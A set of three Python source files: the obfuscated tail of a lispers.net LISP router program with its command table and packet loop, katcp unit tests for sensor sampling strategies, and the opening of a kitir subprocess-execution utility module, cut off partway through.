if 69 - 69: i1IIi
if 59 - 59: II111iiii - o0oOOo0O0Ooo
if 24 - 24: Oo0Ooo - i1IIi + I11i
if 38 - 38: OoooooooOO / I1ii11iIi11i . O0 / i1IIi / Oo0Ooo + iIii1I11I1II1
lisp . lisp_close_socket ( II1iII1i [ 0 ] , "" )
lisp . lisp_close_socket ( II1iII1i [ 1 ] , "" )
lisp . lisp_close_socket ( oO0oIIII , "lisp-rtr" )
lisp . lisp_close_socket ( i111I , "" )
lisp . lisp_close_socket ( Oo0oO0oo0oO00 , "lispers.net-itr" )
iiI1iIiI . close ( )
return
if 96 - 96: iII111i
if 18 - 18: iII111i * I11i - Ii1I
if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if 39 - 39: iIii1I11I1II1 - OoooooooOO
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
def iiIiI ( kv_pair ) :
global II1iII1i
global II1Ii1iI1i
if 87 - 87: ooOoO0o - OoooooooOO + i11iIiiIii
lispconfig . lisp_map_resolver_command ( kv_pair )
if 73 - 73: I11i * OoooooooOO . O0 . IiII
if ( lisp . lisp_test_mr_timer == None or
lisp . lisp_test_mr_timer . is_alive ( ) == False ) :
lisp . lisp_test_mr_timer = threading . Timer ( 2 , lisp . lisp_test_mr ,
[ II1iII1i , II1Ii1iI1i ] )
lisp . lisp_test_mr_timer . start ( )
if 55 - 55: Oo0Ooo
return
if 77 - 77: II111iiii
if 16 - 16: I1IiiI * II111iiii / iIii1I11I1II1 - iII111i
if 3 - 3: I1IiiI * ooOoO0o + II111iiii - OoO0O00
if 97 - 97: I1ii11iIi11i / oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
def iI ( kv_pair ) :
global i111I , iiI1iIiI , II1Ii1iI1i
if 19 - 19: II111iiii
OoOO = lisp . lisp_rloc_probing
if 32 - 32: OoOoOO00 * I1IiiI % ooOoO0o * Ii1I . O0
if 48 - 48: iII111i * iII111i
if 13 - 13: Ii1I / I11i + OoOoOO00 . o0oOOo0O0Ooo % ooOoO0o
if 48 - 48: I1IiiI / i11iIiiIii - o0oOOo0O0Ooo * oO0o / OoooooooOO
lispconfig . lisp_xtr_command ( kv_pair )
if 89 - 89: iIii1I11I1II1 / I1IiiI - II111iiii / Ii1I . i11iIiiIii . Ii1I
if 48 - 48: O0 + O0 . I1Ii111 - ooOoO0o
if 63 - 63: oO0o
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if 36 - 36: IiII
if ( OoOO == False and lisp . lisp_rloc_probing ) :
iI1Ii11iII1 = [ i111I , i111I ,
None , iiI1iIiI ]
lisp . lisp_start_rloc_probe_timer ( 1 , iI1Ii11iII1 )
i1iiI = { "type" : "itr-crypto-port" , "port" : II1Ii1iI1i }
lisp . lisp_write_to_dp_socket ( i1iiI )
if 74 - 74: I1Ii111 % I1ii11iIi11i
if 7 - 7: II111iiii
if 27 - 27: oO0o . OoooooooOO + i11iIiiIii
if 86 - 86: I11i / o0oOOo0O0Ooo - o0oOOo0O0Ooo + I1ii11iIi11i + oO0o
if 33 - 33: o0oOOo0O0Ooo . iII111i . IiII . i1IIi
lisp . lisp_ipc_write_xtr_parameters ( lisp . lisp_debug_logging ,
lisp . lisp_data_plane_logging )
return
if 49 - 49: I1ii11iIi11i
if 84 - 84: I11i - Oo0Ooo / O0 - I1Ii111
if 21 - 21: O0 * O0 % I1ii11iIi11i
if 94 - 94: I11i + II111iiii % i11iIiiIii
if 8 - 8: ooOoO0o * O0
OOoO = {
"lisp xtr-parameters" : [ iI , {
"rloc-probing" : [ True , "yes" , "no" ] ,
"nonce-echoing" : [ True , "yes" , "no" ] ,
"data-plane-security" : [ True , "yes" , "no" ] ,
"data-plane-logging" : [ True , "yes" , "no" ] ,
"flow-logging" : [ True , "yes" , "no" ] ,
"nat-traversal" : [ True , "yes" , "no" ] ,
"checkpoint-map-cache" : [ True , "yes" , "no" ] ,
"ipc-data-plane" : [ True , "yes" , "no" ] ,
"decentralized-push-xtr" : [ True , "yes" , "no" ] ,
"decentralized-pull-xtr-modulus" : [ True , 1 , 0xff ] ,
"decentralized-pull-xtr-dns-suffix" : [ True ] ,
"program-hardware" : [ True , "yes" , "no" ] } ] ,
"lisp map-resolver" : [ iiIiI , {
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"dns-name" : [ True ] ,
"address" : [ True ] } ] ,
"lisp map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"send-map-request" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp rtr-map-cache" : [ lispconfig . lisp_map_cache_command , {
"prefix" : [ ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"rle-name" : [ True ] ,
"elp-name" : [ True ] ,
"address" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"lisp explicit-locator-path" : [ lispconfig . lisp_elp_command , {
"elp-name" : [ False ] ,
"elp-node" : [ ] ,
"address" : [ True ] ,
"probe" : [ True , "yes" , "no" ] ,
"strict" : [ True , "yes" , "no" ] ,
"eid" : [ True , "yes" , "no" ] } ] ,
"lisp replication-list-entry" : [ lispconfig . lisp_rle_command , {
"rle-name" : [ False ] ,
"rle-node" : [ ] ,
"address" : [ True ] ,
"level" : [ True , 0 , 255 ] } ] ,
"lisp json" : [ lispconfig . lisp_json_command , {
"json-name" : [ False ] ,
"json-string" : [ False ] } ] ,
"lisp database-mapping" : [ oO00 , {
"prefix" : [ ] ,
"mr-name" : [ True ] ,
"ms-name" : [ True ] ,
"instance-id" : [ True , 0 , 0xffffffff ] ,
"secondary-instance-id" : [ True , 0 , 0xffffffff ] ,
"eid-prefix" : [ True ] ,
"group-prefix" : [ True ] ,
"dynamic-eid" : [ True , "yes" , "no" ] ,
"signature-eid" : [ True , "yes" , "no" ] ,
"rloc" : [ ] ,
"rloc-record-name" : [ True ] ,
"elp-name" : [ True ] ,
"geo-name" : [ True ] ,
"rle-name" : [ True ] ,
"json-name" : [ True ] ,
"address" : [ True ] ,
"interface" : [ True ] ,
"priority" : [ True , 0 , 255 ] ,
"weight" : [ True , 0 , 100 ] } ] ,
"show rtr-rloc-probing" : [ o00O , { } ] ,
"show rtr-keys" : [ o0OOOOO00o0O0 , { } ] ,
"show rtr-map-cache" : [ i11IiIiiIIIII , { } ] ,
"show rtr-map-cache-dns" : [ i1iIIIiI1I , { } ]
}
if 18 - 18: iIii1I11I1II1 + Oo0Ooo - OOooOOo + OoooooooOO * OoooooooOO
if 41 - 41: ooOoO0o . Oo0Ooo + I1IiiI
if 100 - 100: Ii1I + OoO0O00
if 73 - 73: i1IIi - I1Ii111 % ooOoO0o / OoO0O00
if 40 - 40: I1ii11iIi11i * ooOoO0o - I1IiiI / IiII / i11iIiiIii
if 83 - 83: I1ii11iIi11i / I1Ii111 - i11iIiiIii . iIii1I11I1II1 + Oo0Ooo
if ( iiI1i1Iii111 ( ) == False ) :
lisp . lprint ( "lisp_rtr_startup() failed" )
lisp . lisp_print_banner ( "RTR abnormal exit" )
exit ( 1 )
if 59 - 59: O0 % Oo0Ooo
if 92 - 92: Ii1I % iII111i / I1ii11iIi11i % I1ii11iIi11i * I1IiiI
Oo = [ i111I , oO0oIIII ,
Oo0oO0oo0oO00 ]
oO00oOOo0Oo = [ i111I ] * 3
if 5 - 5: o0oOOo0O0Ooo . O0 / Oo0Ooo % OoO0O00
while ( True ) :
try : OoOo , II , IiiIIIiI1ii = select . select ( Oo , [ ] , [ ] )
except : break
if 78 - 78: O0 * OOooOOo
if 43 - 43: I1ii11iIi11i / I1IiiI . ooOoO0o
if 62 - 62: iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % O0 . I1Ii111
if 93 - 93: i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + o0oOOo0O0Ooo / o0oOOo0O0Ooo / II111iiii
if ( lisp . lisp_ipc_data_plane and Oo0oO0oo0oO00 in OoOo ) :
lisp . lisp_process_punt ( Oo0oO0oo0oO00 , II1iII1i ,
II1Ii1iI1i )
if 49 - 49: OOooOOo . I1ii11iIi11i . i11iIiiIii - II111iiii / Ii1I
if 62 - 62: OOooOOo
if 1 - 1: IiII / IiII - i11iIiiIii
if 87 - 87: Oo0Ooo / O0 * IiII / o0oOOo0O0Ooo
if 19 - 19: I1Ii111 + i1IIi . I1IiiI - Oo0Ooo
if ( i111I in OoOo ) :
iIi1I1 , OO , IIIIii , oO0OOOO0 = lisp . lisp_receive ( oO00oOOo0Oo [ 0 ] ,
False )
if ( OO == "" ) : break
if ( lisp . lisp_is_rloc_probe_request ( oO0OOOO0 [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe request, using pcap" )
continue
if 63 - 63: iII111i * I1ii11iIi11i . OoooooooOO / OOooOOo * Oo0Ooo . ooOoO0o
if ( lisp . lisp_is_rloc_probe_reply ( oO0OOOO0 [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe reply, using pcap" )
continue
if 62 - 62: i1IIi / ooOoO0o . I1IiiI * o0oOOo0O0Ooo
lisp . lisp_parse_packet ( oO00oOOo0Oo , oO0OOOO0 , OO , IIIIii )
if 21 - 21: o0oOOo0O0Ooo
if 81 - 81: I11i / iIii1I11I1II1 - ooOoO0o * I1Ii111 . I1IiiI * I1ii11iIi11i
if 95 - 95: I1IiiI
if 88 - 88: IiII % OoO0O00 + I1Ii111 + I1Ii111 * II111iiii
if 78 - 78: OoooooooOO
if 77 - 77: I1ii11iIi11i / i1IIi / Oo0Ooo % OOooOOo
if ( oO0oIIII in OoOo ) :
iIi1I1 , OO , IIIIii , oO0OOOO0 = lisp . lisp_receive ( oO0oIIII , True )
if 48 - 48: I11i - IiII + iIii1I11I1II1 + OoooooooOO
if ( OO == "" ) : break
if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
if ( iIi1I1 == "command" ) :
if ( oO0OOOO0 == "clear" ) :
lisp . lisp_clear_map_cache ( )
continue
if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
if ( oO0OOOO0 . find ( "clear%" ) != - 1 ) :
lispconfig . lisp_clear_decap_stats ( oO0OOOO0 )
continue
if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
lispconfig . lisp_process_command ( oO0oIIII , iIi1I1 ,
oO0OOOO0 , "lisp-rtr" , [ OOoO ] )
elif ( iIi1I1 == "api" ) :
lisp . lisp_process_api ( "lisp-rtr" , oO0oIIII , oO0OOOO0 )
elif ( iIi1I1 == "data-packet" ) :
O0O ( oO0OOOO0 , "" )
else :
if ( lisp . lisp_is_rloc_probe_request ( oO0OOOO0 [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe request, using pcap" )
continue
if 88 - 88: OoOoOO00 - i11iIiiIii % o0oOOo0O0Ooo * I11i + I1ii11iIi11i
if ( lisp . lisp_is_rloc_probe_reply ( oO0OOOO0 [ 0 ] ) ) :
lisp . lprint ( "RTR ignoring RLOC-probe reply, using pcap" )
continue
if 52 - 52: II111iiii . I1IiiI + OoOoOO00 % OoO0O00
lisp . lisp_parse_packet ( II1iII1i , oO0OOOO0 , OO , IIIIii )
if 62 - 62: o0oOOo0O0Ooo
if 15 - 15: I11i + Ii1I . OOooOOo * OoO0O00 . OoOoOO00
if 18 - 18: i1IIi % II111iiii + I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
I11I ( )
lisp . lisp_print_banner ( "RTR normal exit" )
exit ( 0 )
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
test_sampling.py
|
# test_sampling.py
# -*- coding: utf8 -*-
# vim:fileencoding=utf8 ai ts=4 sts=4 et sw=4
# Copyright 2009 National Research Foundation (South African Radio Astronomy Observatory)
# BSD license - see LICENSE for details
"""Tests for the katcp.sampling module.
"""
from __future__ import absolute_import, division, print_function
from future import standard_library
standard_library.install_aliases() # noqa: E402
import concurrent.futures
import logging
import threading
import tornado.testing
from _thread import get_ident
from tornado import gen
from katcp import Sensor, sampling
from katcp.testutils import (DeviceTestSensor, TestLogHandler,
TimewarpAsyncTestCase)
log_handler = TestLogHandler()
logging.getLogger("katcp").addHandler(log_handler)
logger = logging.getLogger(__name__)
class TestSampling(TimewarpAsyncTestCase):
# TODO Also test explicit ioloop passing
def setUp(self):
"""Set up for test."""
# test sensor
super(TestSampling, self).setUp()
self.sensor = DeviceTestSensor(
Sensor.INTEGER, "an.int", "An integer.", "count",
[-40, 30],
timestamp=self.ioloop_time, status=Sensor.NOMINAL, value=3)
# test callback
def inform(sensor, reading):
assert get_ident() == self.ioloop_thread_id, (
"inform must be called from in the ioloop")
self.calls.append((sensor, reading))
self.calls = []
self.inform = inform
def test_sampling(self):
"""Test getting and setting the sampling."""
s = self.sensor
sampling.SampleNone(None, s)
sampling.SampleAuto(None, s)
sampling.SamplePeriod(None, s, 10)
sampling.SampleEvent(None, s)
sampling.SampleDifferential(None, s, 2)
self.assertRaises(ValueError, sampling.SampleNone, None, s, "foo")
self.assertRaises(ValueError, sampling.SampleAuto, None, s, "bar")
self.assertRaises(ValueError, sampling.SamplePeriod, None, s)
self.assertRaises(ValueError, sampling.SamplePeriod, None, s, "0")
self.assertRaises(ValueError, sampling.SamplePeriod, None, s, "-1")
self.assertRaises(ValueError, sampling.SampleEvent, None, s, "foo")
self.assertRaises(ValueError, sampling.SampleDifferential, None, s)
self.assertRaises(ValueError, sampling.SampleDifferential,
None, s, "-1")
self.assertRaises(ValueError, sampling.SampleDifferential,
None, s, "1.5")
sampling.SampleStrategy.get_strategy("none", None, s)
sampling.SampleStrategy.get_strategy("auto", None, s)
sampling.SampleStrategy.get_strategy("period", None, s, "15")
sampling.SampleStrategy.get_strategy("event", None, s)
sampling.SampleStrategy.get_strategy("differential", None, s, "2")
sampling.SampleStrategy.get_strategy(b"none", None, s)
sampling.SampleStrategy.get_strategy(b"auto", None, s)
sampling.SampleStrategy.get_strategy(b"period", None, s, "15")
sampling.SampleStrategy.get_strategy(b"event", None, s)
sampling.SampleStrategy.get_strategy(b"differential", None, s, "2")
self.assertRaises(ValueError, sampling.SampleStrategy.get_strategy,
"random", None, s)
self.assertRaises(ValueError, sampling.SampleStrategy.get_strategy,
"period", None, s, "foo")
self.assertRaises(ValueError, sampling.SampleStrategy.get_strategy,
"differential", None, s, "bar")
@tornado.testing.gen_test(timeout=200)
# Timeout needs to be longer than 'fake' duration of the test, since the tornado
# ioloop is using out time-warped clock to determine timeouts too!
def test_periodic(self):
t0 = self.ioloop_time
sample_p = 10 # sample DUT in seconds
DUT = sampling.SamplePeriod(self.inform, self.sensor, sample_p)
self.assertEqual(DUT.get_sampling_formatted(), (b'period', [b'10']))
self.assertEqual(self.calls, [])
t, status, value = self.sensor.read()
DUT.start()
yield self.wake_ioloop()
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Warp the ioloop clock forward a bit more than one DUT. Check that
# 1) a sample is sent,
# 2) the next sample is scheduled at t0+DUT, not t0+DUT+extra delay
yield self.set_ioloop_time(t0 + sample_p*1.15)
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Don't expect an update, since we are at just before the next sample DUT
yield self.set_ioloop_time(t0 + sample_p*1.99)
self.assertEqual(self.calls, [])
# Now we are at exactly the next sample time, expect update
yield self.set_ioloop_time(t0 + sample_p*2)
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Bit past previous sample time, expect no update
yield self.set_ioloop_time(t0 + sample_p*2.16)
self.assertEqual(self.calls, [])
# Check that no update is sent if the sensor is updated, but that the next
# periodic update is correct
t, status, value = (t0 + sample_p*2.5, Sensor.WARN, -1)
self.sensor.set(t, status, value)
yield self.set_ioloop_time(t0 + sample_p*2.6)
self.assertEqual(self.calls, [])
yield self.set_ioloop_time(t0 + sample_p*3)
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Cancel strategy and check that its timeout call is cancelled.
DUT.cancel()
yield self.wake_ioloop()
yield self.set_ioloop_time(t0 + sample_p*4.1)
self.assertEqual(self.calls, [])
@tornado.testing.gen_test(timeout=200)
def test_auto(self):
t0 = self.ioloop_time
DUT = sampling.SampleAuto(self.inform, self.sensor)
self.assertEqual(DUT.get_sampling_formatted(), (b'auto', []))
self.assertEqual(self.calls, [])
t, status, value = self.sensor.read()
DUT.start()
yield self.wake_ioloop()
# Check that it is attached
self.assertTrue(DUT in self.sensor._observers)
# The initial update
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Move along in time, don't expect any updates
yield self.set_ioloop_time(t0 + 20)
self.assertEqual(self.calls, [])
# Now update the sensor a couple of times
t1, status1, value1 = t0 + 21, Sensor.ERROR, 2
t2, status2, value2 = t0 + 22, Sensor.NOMINAL, -1
self.sensor.set(t1, status1, value1)
self.sensor.set(t2, status2, value2)
self.assertEqual(self.calls, [(self.sensor, (t1, status1, value1)),
(self.sensor, (t2, status2, value2))])
self.calls = []
self._thread_update_check(t, status, value)
yield self._check_cancel(DUT)
@gen.coroutine
def _thread_update_check(self, ts, status, value):
# Check update from thread (inform() raises if called from the wrong thread)
# Clears out self.calls before starting
self.calls = []
f = concurrent.futures.Future()
def do_update():
try:
self.sensor.set(ts, status, value)
finally:
f.set_result(None)
return f
t = threading.Thread(target=do_update)
t.start()
yield f
yield self.wake_ioloop()
self.assertEqual(self.calls, [(self.sensor, (ts, status, value))])
@gen.coroutine
def _check_cancel(self, DUT):
# Check post-cancel cleanup
DUT.cancel()
yield self.wake_ioloop()
self.assertFalse(DUT in self.sensor._observers)
@tornado.testing.gen_test(timeout=200)
def test_differential(self):
"""Test SampleDifferential strategy."""
t, status, value = self.sensor.read()
delta = 3
DUT = sampling.SampleDifferential(self.inform, self.sensor, delta)
self.assertEqual(DUT.get_sampling_formatted(), (b'differential', [b'3']))
self.assertEqual(len(self.calls), 0)
DUT.start()
yield self.wake_ioloop()
# Check initial update
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Some Updates less than delta from initial value
self.sensor.set_value(value + 1)
self.sensor.set_value(value + delta)
self.sensor.set_value(value)
self.sensor.set_value(value - 2)
self.assertEqual(len(self.calls), 0)
# Now an update bigger than delta from initial value
self.sensor.set(t, status, value + delta + 1)
yield self.wake_ioloop()
self.assertEqual(self.calls, [(self.sensor, (t, status, value + delta + 1))])
self.calls = []
# Now change only the status, should update
t, status, value = self.sensor.read()
self.sensor.set(t, Sensor.ERROR, value)
self.assertEqual(self.calls, [(self.sensor, (t, Sensor.ERROR, value))])
# Test threaded update
yield self._thread_update_check(t, status, value)
yield self._check_cancel(DUT)
def test_differential_timestamp(self):
# Test that the timetamp differential is stored correctly as
# seconds. This is mainly to check the conversion of the katcp spec from
# milliseconds to seconds for katcp v5 spec.
time_diff = 4.12 # Time differential in seconds
ts_sensor = Sensor(Sensor.TIMESTAMP, 'ts', 'ts sensor', '')
diff = sampling.SampleDifferential(self.inform, ts_sensor, time_diff)
self.assertEqual(diff.get_sampling_formatted(), (b'differential', [b'4.12']))
self.assertEqual(diff._threshold, time_diff)
@tornado.testing.gen_test(timeout=200)
def test_event_rate(self):
"""Test SampleEventRate strategy."""
shortest = 1.5
longest = 4.5
t, status, value = self.sensor.read()
DUT = sampling.SampleEventRate(self.inform, self.sensor, shortest, longest)
self.assertEqual(DUT.get_sampling_formatted(), (b'event-rate', [b'1.5', b'4.5']))
self.assertEqual(len(self.calls), 0)
DUT.start()
yield self.wake_ioloop()
# Check initial update
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Too soon, should not send update
yield self.set_ioloop_time(t_last_sent + shortest*0.99)
value = value + 3
t = self.ioloop_time
self.sensor.set(t, status, value)
self.assertEqual(len(self.calls), 0)
# Too soon again, should not send update
yield self.set_ioloop_time(t_last_sent + shortest*0.999)
value = value + 1
t = self.ioloop_time
self.sensor.set(t, status, value)
self.assertEqual(len(self.calls), 0)
# Should now get minimum time update
yield self.set_ioloop_time(t_last_sent + shortest)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Warp to just before longest period, should not update
yield self.set_ioloop_time(t_last_sent + longest*0.999)
self.assertEqual(len(self.calls), 0)
# Warp to longest period, should update
yield self.set_ioloop_time(t_last_sent + longest)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Warp to just before next longest period, should not update
yield self.set_ioloop_time(t_last_sent + longest*0.999)
self.assertEqual(len(self.calls), 0)
# Warp to longest period, should update
yield self.set_ioloop_time(t_last_sent + longest)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Set identical value, jump past min update time, no update should happen
self.sensor.set(self.ioloop_time, status, value)
yield self.set_ioloop_time(t_last_sent + shortest)
self.assertEqual(len(self.calls), 0)
# Set new value, update should happen
value = value - 2
self.sensor.set(self.ioloop_time, status, value)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t_last_sent, status, value))])
self.calls = []
# Now warp to after min period, change only status, update should happen
yield self.set_ioloop_time(t_last_sent + shortest)
status = Sensor.ERROR
self.sensor.set(self.ioloop_time, status, value)
self.assertEqual(self.calls, [(self.sensor, (self.ioloop_time, status, value))])
t_last_sent = self.ioloop_time
self.calls = []
yield self.set_ioloop_time(t_last_sent + shortest)
status = Sensor.NOMINAL
value = value + 1
yield self._thread_update_check(self.ioloop_time, status, value)
yield self._check_cancel(DUT)
self.calls = []
# Since strategy is cancelled, no futher updates should be sent
yield self.set_ioloop_time(self.ioloop_time + 5*longest)
self.sensor.set(self.ioloop_time, Sensor.WARN, value + 3)
self.assertEqual(len(self.calls), 0)
@tornado.testing.gen_test(timeout=2000000)
def test_event(self):
"""Test SampleEvent strategy."""
DUT = sampling.SampleEvent(self.inform, self.sensor)
self.assertEqual(DUT.get_sampling_formatted(), (b'event', []))
self.assertEqual(self.calls, [])
DUT.start()
yield self.wake_ioloop()
# Check initial update
self.assertEqual(len(self.calls), 1)
# Jump forward a lot, should not result in another sample
yield self.set_ioloop_time(200000)
self.assertEqual(len(self.calls), 1)
self.sensor.set_value(2, status=Sensor.NOMINAL)
self.assertEqual(len(self.calls), 2)
# Test that an update is suppressed if the sensor value is unchanged
self.sensor.set_value(2, status=Sensor.NOMINAL)
self.assertEqual(len(self.calls), 2)
# Test that an update happens if the status changes even if the value is
# unchanged
self.sensor.set_value(2, status=Sensor.WARN)
self.assertEqual(len(self.calls), 3)
@tornado.testing.gen_test(timeout=200)
def test_differential_rate(self):
delta = 2
shortest = 1.5
longest = 4.5
t, status, value = self.sensor.read()
DUT = sampling.SampleDifferentialRate(
self.inform, self.sensor, delta, shortest, longest)
self.assertEqual(
DUT.get_sampling_formatted(), (b'differential-rate', [b'2', b'1.5', b'4.5']))
self.assertEqual(len(self.calls), 0)
DUT.start()
yield self.wake_ioloop()
# Check initial update
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Too soon, should not send update
yield self.set_ioloop_time(t_last_sent + shortest*0.99)
value = value + delta + 1
t = self.ioloop_time
self.sensor.set(t, status, value)
self.assertEqual(len(self.calls), 0)
# Too soon again, should not send update
yield self.set_ioloop_time(t_last_sent + shortest*0.999)
value = value + delta + 1
t = self.ioloop_time
self.sensor.set(t, status, value)
self.assertEqual(len(self.calls), 0)
# Should now get minimum time update
yield self.set_ioloop_time(t_last_sent + shortest)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Warp to just before longest period, should not update
yield self.set_ioloop_time(t_last_sent + longest*0.999)
self.assertEqual(len(self.calls), 0)
# Warp to longest period, should update
yield self.set_ioloop_time(t_last_sent + longest)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Warp to just before next longest period, should not update
yield self.set_ioloop_time(t_last_sent + longest*0.999)
self.assertEqual(len(self.calls), 0)
# Warp to longest period, should update
yield self.set_ioloop_time(t_last_sent + longest)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t, status, value))])
self.calls = []
# Set value with to small a change, jump past min update time, no update should
# happen
value = value - delta
self.sensor.set(self.ioloop_time, status, value)
yield self.set_ioloop_time(t_last_sent + shortest)
self.assertEqual(len(self.calls), 0)
# Set new value with large enough difference, update should happen
value = value - 1
self.sensor.set(self.ioloop_time, status, value)
t_last_sent = self.ioloop_time
self.assertEqual(self.calls, [(self.sensor, (t_last_sent, status, value))])
self.calls = []
# Now warp to after min period, change only status, update should happen
yield self.set_ioloop_time(t_last_sent + shortest)
status = Sensor.ERROR
self.sensor.set(self.ioloop_time, status, value)
self.assertEqual(self.calls, [(self.sensor, (self.ioloop_time, status, value))])
t_last_sent = self.ioloop_time
self.calls = []
yield self.set_ioloop_time(t_last_sent + shortest)
status = Sensor.NOMINAL
value = value + 1
yield self._thread_update_check(self.ioloop_time, status, value)
yield self._check_cancel(DUT)
self.calls = []
# Since strategy is cancelled, no futher updates should be sent
yield self.set_ioloop_time(self.ioloop_time + 5*longest)
self.sensor.set(self.ioloop_time, Sensor.WARN, value + 3)
self.assertEqual(len(self.calls), 0)
|
exec_utils.py
|
#! /usr/bin/env python
# Standard Imports
import select
import subprocess
import time
import tempfile
import pickle
import itertools
import multiprocessing
from datetime import datetime
from collections import OrderedDict
from threading import Thread
from queue import Queue, Empty
# Lib Imports
from .file_utils import write_file, read_file, get_tmp_dir
from .log_utils import get_log_func, log_datetime_format
from .string_utils import get_datestring
# kitir Imports
from kitir import *
# logging
log = logging.getLogger('kitir.utils.exec')
# kwargs for subprocess (used by iexec)
SUBPROCESS_KWARGS = ['bufsize', 'executable', 'stdin', 'stdout', 'stderr',
'preexec_fn', 'close_fds', 'shell', 'cwd', 'env',
'universal_newlines', 'startupinfo', 'creationflags']
class MultiProcess:
# todo: move to own util / document
counter = itertools.count()
def __init__(self, name, func, args, kwargs):
self.name = name
self.func = func
self.args = args
self.kwargs = kwargs
self.proc = None
def wait_read_result(self):
self.join()
if not self.kwargs.get('pickle_result', False):
return self.exitcode
with open(self.kwargs['pickle_result'], 'rb') as f:
return pickle.load(f)
def go(self):
self.start()
self.join()
return self.exitcode
def start(self):
self.proc = multiprocessing.Process(target=self.func, name=self.name, args=self.args, kwargs=self.kwargs)
self.proc.start()
def join(self, timeout=None):
self.proc.join(timeout)
def is_alive(self):
return self.proc.is_alive()
def kill(self):
self.proc.terminate()
def get_pid(self):
return self.proc.ident
def send_signal(self, signal):
if self.get_pid():
return os.kill(self.get_pid(), signal)
@property
def exitcode(self):
return self.proc.exitcode
class ExecResult:
"""Result of an execution. Has STDOUT and STDERR and RC."""
def __init__(self, out=None, err=None, rc=0, time_taken=None, cmd=None, ordered_out=None, start=None, timeout=0,
subprocess_kwargs=None):
self.out = out or []
self.err = err or []
self.rc = rc
self.__out = ''
self.__err = ''
self.time = time_taken
self.start = start
self.start_datetime = datetime.fromtimestamp(start).strftime(log_datetime_format)
self.timeout = timeout
self.cmd = cmd
self.ordered_out = ordered_out
self.subprocess_kwargs = subprocess_kwargs or {}
def contents(self):
"""Returns all the content of the execution as a string, ordered if possible, else stdout first then stderr"""
if self.ordered_out:
return ''.join(self.ordered_out)
return '\n'.join([self.out_string, self.err_string])
def list_contents(self):
"""Returns all the content of the execution as a list, ordered if possible, else stdout first then stderr"""
if self.ordered_out:
return self.ordered_out
return self.out + self.err
def out_contains(self, content):
"""Check if stdout contains the content
:param content:
"""
return self._contains(content, self.out_string)
def err_contains(self, content):
"""Check if stderr contains the content
:param content:
"""
return self._contains(content, self.err_string)
def contains(self, content, collection_func=all):
"""Check if either stdout or stderr contains the content
:param content: string or collection of strings
:param collection_func: specify any or all func
"""
if isinstance(content, str):
return bool(self.out_contains(content) or self.err_contains(content))
else:
return collection_func(self.contains(c, collection_func) for c in content)
@staticmethod
def _contains(content, collection):
"""helper"""
if isinstance(content, str):
return bool(content in collection)
elif isinstance(content, list):
return all(c in collection for c in content)
else:
raise ValueError('Unsupported type: type={}'.format(type(content)))
def debug_output(self, dump_kwargs=False):
"""returns a debug output string that is ready for printing or writing"""
return self.get_dump_data(dump_kwargs)
def get_dump_header(self, as_str=True):
"""Formats all headers for dumping; cmd, rc, start, time"""
headers = ['cmd', 'rc', 'start', 'start_datetime', 'time']
